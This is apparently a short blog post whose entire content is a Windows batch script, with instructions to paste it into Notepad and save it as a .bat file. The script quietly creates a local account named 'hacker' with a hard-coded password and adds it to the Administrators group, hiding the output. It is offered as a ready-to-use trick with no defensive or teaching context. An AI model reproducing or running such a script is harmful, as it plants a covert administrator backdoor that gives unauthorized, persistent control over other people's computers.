just copy the following code in notepad
- open notepad copy the code below and paste it in notepad
- @echo off
SET SECRETUSER=hacker
SET SECRETPASSWORD=nilesh
net user %SECRETUSER% %SECRETPASSWORD% /add && net localgroup administrators %SECRETUSER% /add>nul 2>&1
- and save the file as any name with bat extension like niki.bat remember that .bat is the file extension
thanks K
No comments:
Post a Comment